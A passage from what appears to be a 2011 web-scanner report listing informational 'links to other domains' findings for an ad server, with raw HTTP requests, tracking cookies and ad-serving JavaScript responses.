GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=9862538590095938&clkurl=http://ib.adnxs.com/click/cD0K16NwzT9xPQrXo3DNPwAAAEAzMwdA5QzFHW-y8D_lDMUdb7LwP7zkV1ZoqVQpSsYda6b2ziUgS7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAKAcBAgUCAAQAAAAA3CHDJQAAAAA./cnd=!chDNzwiQmQMQxskKGAAg0ccBKEsxV_RVCW-y8D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBSMEqIEu0TdSiA829sQf_uKGCDNfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgC5gHAAgTIAoXSzwqoAwHoA7wB6AOUAvUDAAAAxIAG6LfOqsGOsobRAQ%26num%3D1%26sig%3DAGiWqtwu_xZ0ijvOML45dyfc2hZbxHNbcg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679347&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661347006&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661347010&frm=1&adk=2614322350&ga_vid=708894165.1303661347&ga_sid=1303661347&ga_hid=955027229&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU.F3RuHvJzBu.z.YBaeVDIgZe2bIDA3gBY2BgEGRg6lzCwJLdxsDI.52B4YYLAwMDJwMDo36HhPttqFwLUO4nUM4NIWenjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FeYHzDc2T5jATtOfTNsW3HKTX_oiVuuYyVuOVNdnHLTbirilKss82VgmhzKwOrwhIFRJ4.B4aPQfyAAxUN.AGM1A5O_DQPLC28GRi0mBoZLz2DxkKY8KwgoZwWVYwTKPYDLKUmpA9mMuO3sFgLKM_huzmBg4ABG.k5GoGKGwFuMTECKwYCRgY.BQcEMLLi0ACzIksnICpRjCWFiZWQDMuR3MTJwgdOKw4dXILMYGAAfVn6K

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU4Ho4GhMNTO2javi9DkYkdWBJL5gDA3gBY2BgEGJg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HawMHVK4NKPcdKOcCl5Nwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiJOucoyXwamyaEMrA5PGBh18hgYPgr9BwJQHOUHMFYzMPnbMLC88GZg1GJiYLj0DBZHacqzgoByVlA5RqDcA7ickpQ6kM2I285uIaA8g._mDAYGDmCC2MkIVMwQeIuRCUgxGDAy8DMwKJiBBZcWgAVZMhlZgXIsIUysjGxAhvwuRgYueDoCGcYAAOS4gxQ-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:09:06 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4053
Date: Sun, 24 Apr 2011 16:09:06 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=108323742?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU8WaL.ixUWA6VYH0NyC0NoIF0VH9nZW8sdXNhLHQsMTMwMzY2MTM0NjgyNSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL2NEMEsxNk53elQ5eFBRclhvM0ROUHdBQUFFQXpNd2RBNVF6RkhXLXk4RF9sRE1VZGI3THdQN3prVjFab3FWUXBTc1lkYTZiMnppVWdTN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUtBY0JBZ1VDQUFRQUFBQUEzQ0hESlFBQUFBQS4vY25kPSFjaEROendpUW1RTVF4c2tLR0FBZzBjY0JLRXN4Vl9SVkNXLXk4RDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJTTUVxSUV1MFRkU2lBODI5c1FmX3VLR0NETmZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDNWdIQUFnVElBb1hTendxb0F3SG9BN3dCNkFPVUF2VURBQUFBeElBRzZMZk9xc0dPc29iUkFRJm51bT0xJnNpZz1BR2lXcXR3dV94WjBpanZPTUw0NWR5ZmMyaFpieEhOYmNnJmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
QUFnVElBb1hTendxb0F3SG9BN3dCNkFPVUF2VURBQUFBeElBRzZMZk9xc0dPc29iUkFRJm51bT0xJnNpZz1BR2lXcXR3dV94WjBpanZPTUw0NWR5ZmMyaFpieEhOYmNnJmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=108323742" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=215239555" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.9. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=23216307838447390&clkurl=http://ib.adnxs.com/click/KVyPwvUo3D8pXI_C9SjcPwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1PyPD10Szk0Y9SsYda6b2ziWNP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAQRABAgUCAAQAAAAAByIdNAAAAAA./cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBw2WRjD-0TYabOc7ilQe2lLnTAdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqty_kivWyoJD_Hr1F2kWXBBBlx7Kqg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383920&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658383931&frm=1&adk=2614322350&ga_vid=22955387.1303658384&ga_sid=1303658384&ga_hid=456012454&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUwDPqfRB64ddpuy3kH4pbsq_jrkkDA3gBY2BgEGRg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhPsH3HJ22lC5NqC.70B9LjB97Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o19x.qF9xgJ2nPpm2LbilJv.0BO3XMdK3HKmujjlpt1UxClXWebLwDQ5lIHV4QkDo04eA8NHof9AAIqH_ADGagYmfxsGlhfeDIxaTAwMl57BwjpNeVYQUM4KKscIlHsAl1OSUgeyGXHb2S0ElGfw3ZzBwMABjPSdjEDFDIG3GJmAFIMBIwMfA4OCGVhwaQFYkCWTkRUoxxLCxMrIBmTI72JkYIenFZBhDABLSH3T; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:43 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4063
Date: Sun, 24 Apr 2011 15:19:42 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1582420280?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUg86d4or0xoouEvKfkkujbJtTkRVnZW8sdXNhLHQsMTMwMzY1ODM4MzM0NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0tWeVB3dlVvM0Q4cFhJX0M5U2pjUHdBQUFFQXpNd2RBLXlFMldEaUo5VF83SVRaWU9JbjFQeVBEMTBTemswWTlTc1lkYTZiMnppV05QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQVFSQUJBZ1VDQUFRQUFBQUFCeUlkTkFBQUFBQS4vY25kPSFyeEZHRmdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4XzVUeXZEaUo5VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ3MldSakQtMFRZYWJPYzdpbFFlMmxMblRBZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXJnRHdBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0eV9raXZXeW9KRF9IcjFGMmtXWEJCQmx4N0txZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUlFeUFLRjBzOEtxQU1CNkFPOEFlZ0RsQUwxQXdBQUFNU0FCdWkzenFyQmpyS0cwUUUmbnVtPTEmc2lnPUFHaVdxdHlfa2l2V3lvSkRfSHIxRjJrV1hCQkJseDdLcWcmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1582420280" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=674985428" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.10. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=47712248167954380&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdA-DQnLzKB5z_4NCcvMoHnPxnsrvSuVyNySsYda6b2ziV-UrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAFAcBAgUCAAQAAAAAxiIVowAAAAA./cnd=!ERDMugiQmQMQxskKGAAg0ccBKEsxdSC_azKB5z9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBtxJ_fVK0Ta-3PIu0sQf734nLCtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwIHYeoa95Y661w-QRjmHXxPOHSEQ%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681232&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663232891&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663232897&frm=1&adk=2614322350&ga_vid=2063264456.1303663233&ga_sid=1303663233&ga_hid=753296769&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUT9qLjz2Zm9NiEFg3paXYGLcX2UIDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HhNc1nHJ.E0Jwyrk2cEDl2oBmfgea6QI3U8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8GZgmhzKwOjxhYNTJY2D4KPQfCEBxmx_AWM3A5G_DwPLCm4FRi4mB4dIzWBylKc8KAspZQeUYgXIP4HJKUupANiNuO7uFgPIMvpszGBg4gAlpJyNQMUPgLUYmIMVgwMggyMCgYAYWXFoAFmTJZGQFyrGEMLEysgEZ8rsYGbig6e86yCwGBgAWjZB.

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU7YHAgDFjVK1mMoJSeWtqvPKaAQcDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35Hktt1nHIRXtdwyvlNCMEp59rAAZVrA9r3HWifC9w.CffbOPVJ2Gnj0td.cucmXPraT86oxSl3QngxTrljCx7hlDv6VRCn3IwF7LjlbFtxyk1_6IlbrmMlbjlTXZxy024q4pSrLPNlYJocysDq8ISBUSePgeGj0H8gAMV7fgBjNQOTvw0DywtvBkYtJgaGS89gcZSmPCsIyGbEbW63EFCewXdzBgMDBzAh7WQEKmYIvMXIBKQYDBgZgNIKZmDBpQVgQZZMRlagHEsIEysjG5Ahv4uRgQue_kCGMQAA8RqSag--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:40:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4048
Date: Sun, 24 Apr 2011 16:40:32 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=43512270?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUN3Xros9Ea4pMRnmQk3pok9iEDGBnZW8sdXNhLHQsMTMwMzY2MzIzMjcyOCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBLURRbkx6S0I1el80TkNjdk1vSG5QeG5zcnZTdVZ5TnlTc1lkYTZiMnppVi1VclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUZBY0JBZ1VDQUFRQUFBQUF4aUlWb3dBQUFBQS4vY25kPSFFUkRNdWdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4ZFNDX2F6S0I1ejlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ0eEpfZlZLMFRhLTNQSXUwc1FmNzM0bkxDdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d0lIWWVvYTk1WTY2MXctUVJqbUhYeFBPSFNFUSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
TUFDQk1nQ2hkTFBDcWdEQWVnRHZBSG9BNVFDOVFNQUFBREVnQWJvdDg2cXdZNnlodEVCJm51bT0xJnNpZz1BR2lXcXR3SUhZZW9hOTVZNjYxdy1RUmptSFh4UE9IU0VRJmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=43512270" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1681222967" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.11. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=87014582729898400&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAxSCwcmgR6T_FILByaBHpPy8ukoDR0nkkSsYda6b2ziVyTbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAGw8BAgUCAAQAAAAAzCL1pwAAAAA./cnd=!QxFr_wiQmQMQxskKGAAg0ccBKEsx4pnD62gR6T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBboJnck20TcilAsHjlQeFvP34Atfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwVrMHKKZVemRm5XFLaOSGOVALJPg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
